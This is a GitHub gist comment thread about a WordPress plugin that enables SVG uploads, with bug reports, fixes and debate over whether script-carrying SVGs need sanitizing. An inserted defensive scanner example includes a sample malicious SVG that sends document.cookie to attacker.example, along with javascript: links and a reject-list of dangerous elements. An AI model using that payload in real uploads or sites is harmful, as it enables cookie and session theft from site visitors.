@Lewiscowles1986
Last active August 4, 2016 13:45
SVG Media Plugin for WordPress (Works since 4.1.2!)
<?php
// Please see https://github.com/Lewiscowles1986/WordPressSVGPlugin from now on
@georgestephanis

As I commented on Twitter, please, please add a caveat for current_user_can( 'unfiltered_html' ). Allowing arbitrary SVG uploads that could contain malicious scripts within the SVGs is super scary.

ref: http://blog.guya.net/2014/02/17/svg-for-fun-and-phishing/

@Lewiscowles1986
Author

Hey guys,

@Dragonspence, apologies, I won't be supporting PHP 5.2 or 5.3; they should not be used in production in 2015, and anyone providing these versions to customers or their boss without a disclaimer is, in my opinion, doing their clients and/or boss harm. I moved to PHP 5.4 in 2012 and am now working with 5.5 and 5.6, so I don't support anything less than 5.4 as a matter of professional standards, and if asked to support 5.3 code specifically, I issue a disclaimer as part of professional conduct; but you are right, anyone else can add it, it's pretty simple, not too big a deal. I am also pretty sure my function cannot be used anywhere else, but they should have mb_string replace if being used in any install with UTF-8 containing WordPress core files 😊

@georgestephanis, I wrote about this on the WordPress Trac. SVG is not the only format that allows this; I view it as needlessly restrictive and the job of a good antivirus & malware suite, but https://github.com/grok/wordpress-plugin-scalable-vector-graphics seems to have some form of sanitization in his more feature-filled plugin (the sanitization, AFAIK), which I am told will have 4.0 support brought in from this plugin soon ;). It also seems to have 5.3 support. I would say to anyone concerned about this: you are assuming and accepting within your plans uploads of content from people either not paying due diligence, or people who represent more of a security threat than just uploading SVG files with malicious elements. I would consider this, and move your scanner / sanitizer to a background daemon with inotify on file changes so a report and remittance could be pursued (a different approach entirely).
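What georgestephanis's caveat and the scanning Lewis mentions look like when put into one plugin file, as an added example written for this thread (not code from the gist, from Lewis's GitHub repo, or from grok's plugin). It assumes only real WordPress pieces: the `upload_mimes` and `wp_handle_upload_prefilter` filters and the `unfiltered_html` capability. `svg_find_active_content()`, its reject-list and the malicious SVG it is run against are this example's own constructions. Outside WordPress the file runs stand-alone and scans the constructed sample.

```php
<?php
// Added example for this thread, not code from the gist or from either plugin linked above.
// Assumed real WordPress hooks: 'upload_mimes', 'wp_handle_upload_prefilter'; capability
// 'unfiltered_html'. svg_find_active_content() and its reject-list are this example's own.

/**
 * Return the reasons an SVG must be treated as active content (empty array = nothing found).
 * Reject-list scan for elements that run code, on* handlers, script/data URLs, remote
 * references and DTDs (which can carry entity declarations). It does not repair the file.
 */
function svg_find_active_content(string $svg): array
{
    $findings = [];
    if (preg_match('/<!(DOCTYPE|ENTITY)/i', $svg)) {
        $findings[] = 'DOCTYPE/ENTITY declaration';
    }

    $keep = libxml_use_internal_errors(true);
    $dom  = new DOMDocument();
    // LIBXML_NONET: nothing is fetched over the network while parsing; LIBXML_NOENT is deliberately absent.
    $ok = $dom->loadXML($svg, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($keep);
    if (!$ok) {
        return ['not well-formed XML'];
    }
    if (strtolower($dom->documentElement->localName) !== 'svg') {
        $findings[] = 'root element is not <svg>';
    }

    // set/animate can rewrite attributes at runtime (e.g. turn an href into javascript:)
    $badElements = ['script', 'foreignobject', 'iframe', 'embed', 'object', 'handler', 'set', 'animate'];
    $uriAttrs    = ['href', 'src', 'data', 'from', 'to', 'values'];   // localName: xlink:href is 'href'
    $cssRisk     = '/@import|url\s*\(|expression\s*\(/i';

    foreach ((new DOMXPath($dom))->query('//*') as $el) {
        $tag = strtolower($el->localName);
        if (in_array($tag, $badElements, true)) {
            $findings[] = "<$tag> element";
        }
        if ($tag === 'style' && preg_match($cssRisk, $el->textContent)) {
            $findings[] = '<style> with @import/url()/expression()';
        }
        foreach ($el->attributes as $attr) {
            $name  = strtolower($attr->localName);
            // strip all whitespace first: "java&#9;script:" decodes to a tab inside the scheme
            $value = strtolower(preg_replace('/\s+/', '', $attr->value));
            if (strncmp($name, 'on', 2) === 0) {
                $findings[] = "$name handler on <$tag>";
            } elseif ($name === 'style' && preg_match($cssRisk, $value)) {
                $findings[] = "style attribute with @import/url()/expression() on <$tag>";
            } elseif (in_array($name, $uriAttrs, true)) {
                $rasterData = (bool) preg_match('#^data:image/(png|jpeg|gif|webp);#', $value);
                if (preg_match('/^(javascript|vbscript):/', $value) || (strncmp($value, 'data:', 5) === 0 && !$rasterData)) {
                    $findings[] = "$name=\"$value\" on <$tag>";
                } elseif (preg_match('#^([a-z]+:)?//#', $value)) {
                    $findings[] = "remote reference in $name on <$tag>";
                }
            }
        }
    }
    return $findings;
}

if (function_exists('add_filter')) {
    // Gate 1: only users who may post raw HTML anyway (unfiltered_html) get SVG as an allowed type.
    add_filter('upload_mimes', function (array $mimes): array {
        if (current_user_can('unfiltered_html')) {
            $mimes['svg'] = 'image/svg+xml';
        }
        return $mimes;
    });
    // Gate 2: even for them, refuse active content before WordPress moves the file into uploads/.
    add_filter('wp_handle_upload_prefilter', function (array $file): array {
        if (strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)) === 'svg') {
            $findings = svg_find_active_content((string) file_get_contents($file['tmp_name']));
            if ($findings) {
                $file['error'] = 'SVG rejected: ' . implode('; ', $findings);   // WP aborts and shows this
            }
        }
        return $file;
    });
} else {
    // Stand-alone run (`php svg-gate.php`): a constructed malicious sample beside a clean one.
    $evil = <<<'SVG'
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="java&#9;script:alert(2)"><circle r="10"/></a>
  <image href="//attacker.example/track.png" width="1" height="1"/>
</svg>
SVG;
    print_r(svg_find_active_content($evil));
    print_r(svg_find_active_content('<svg xmlns="http://www.w3.org/2000/svg"><circle r="10"/></svg>'));
}
```

Setting `$file['error']` in `wp_handle_upload_prefilter` is the documented way to abort an upload; WordPress stops there and surfaces the message in the uploader. The capability gate is the important half: an SVG with a `<script>` that a user could upload is no worse than the raw `<script>` that same user is already allowed to put in a post with `unfiltered_html`. The scan is a reject-list, so treat it as a last line rather than the only one; an allow-list sanitizer that rebuilds the document from known-safe elements and attributes, or serving uploads from a separate origin, limits what a missed vector can do.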

@gcupat

gcupat commented Apr 20, 2015

This is great! Just what I needed. I did notice something and I am not sure if it is just me, but when I enable the plugin I can upload SVGs, but then I can't upload JPGs; it gives me the error message "Sorry, this file type is not permitted for security reasons". Is there something that I am missing?
Thanks in advance.

@tomyorkey

I have the same problem. JPGs can't be uploaded for some reason. Any suggestions? Thanks!

@Kateriine

Hello, same here, and for PNGs too. Here is a solution that seems to work:

add_action('admin_init', 'add_svg_upload');
function add_svg_upload() {
    add_filter('upload_mimes', 'svg_upload_mimes');
    ob_start();

    // On shutdown, collect every open output buffer (outermost first) and run
    // the whole page through the 'final_output' filter before echoing it.
    add_action('shutdown', function () {
        $final = '';
        // ob_get_level() already returns the nesting depth as an int; count() on it was a bug
        while (ob_get_level() > 0) {
            $final = ob_get_clean() . $final;
        }
        echo apply_filters('final_output', $final);
    }, 0);

    // Patch the media-library Underscore templates so an 'svg+xml' attachment gets
    // its own preview branch. Double-quoted strings so the single quotes inside the
    // template survive (unescaped single quotes inside single quotes do not parse).
    add_filter('final_output', function ($content) {
        $content = str_replace(
            "<# } else if ( 'image' === data.type && data.sizes && data.sizes.full ) { #>",
            "<# } else if ( 'svg+xml' === data.subtype ) { #>"
            // the SVG preview markup for this branch did not survive on the page; add yours here
            . "<# } else if ( 'image' === data.type && data.sizes && data.sizes.full ) { #>",
            $content
        );
        $content = str_replace(
            "<# } else if ( 'image' === data.type && data.sizes ) { #>",
            "<# } else if ( 'svg+xml' === data.subtype ) { #>"
            // same here: the preview markup for the grid view was lost
            . "<# } else if ( 'image' === data.type && data.sizes ) { #>",
            $content
        );
        return $content;
    });
}

function svg_upload_mimes($existing_mimes = array()) {
    $existing_mimes['svg'] = 'image/svg+xml';
    return $existing_mimes;
}

@Lewiscowles1986
Author

Oh hey guys, didn't see your comments there. JPG and PNG work from 4.1.2 until the most recent version; please check your other plugins and theme first ;)

Also I noticed the only mod was to existing_mimes being passed to the function. Please link code in gists; you can fork them and it looks much better. I have added it in as it does look like $mimes is appearing from nowhere, but it seems to work... strange.

@telemarker

Hey Lewis,
great plugin!
Still, there are things that need to be done to make it perfect:
– if I add an SVG to the TinyMCE field like a normal picture, the height is 1 x 1 px
I tried many things with the first point but somehow my admin CSS does not grab the image in TinyMCE at all.

@Lewiscowles1986
Author

Hey buddy,

Weird for sure. Just checked it out; the 1px x 1px error is WP internal, but I'll see what I can do to remit.

@telemarker

any news on this?

@telemarker

Hey Lewis, did you check on this issue? It's not a small one if you want to use SVG in your site content.

@Lewiscowles1986
Author

@telemarker, the 1px x 1px is probably a problem with your CSS rules; you may need to pass new rules to TinyMCE about your grid or container CSS.

@Lewiscowles1986
Author

Update to give multiple 🖕 to WP 4.5+'s new custom logo incompatibility

@goldnate

Umm, I tried to activate and got this exception:

Plugin could not be activated because it triggered a fatal error.

Parse error: syntax error, unexpected '[' in /nas/content/staging/cpsbop/wp-content/plugins/lc-svg-upload.php on line 15

Advice?

@ameliemelo1

Yes, Goldnate, I have the same problem. I had to revert back to plugin version 1.4.

@cfxd

cfxd commented Jul 15, 2016

@goldnate @SBGUY your server is running an outdated version of PHP. Replace [] with array().

@Lewiscowles1986
Author

@SBGUY @goldnate if you are running old PHP I'm afraid you'll have to edit as @cfxd says. I've deliberately used new array syntax to encourage users to update their stack or not use.

@grok

grok commented Jul 28, 2016

Just weighing in here -- I decided to remove the sanitization from my plugin mentioned above. The goal of the plugin is to enable the easy utilization of SVG, not to provide safety.

I think security plugins could do a better job of scanning files and such for that. I've chosen to narrow the focus of my plugin 😃

@Lewiscowles1986
Author

@grok, thanks for the update, I really do like what you have done with your plugin. Check out the GitHub repo for some third-party contributed code (merge maybe?)
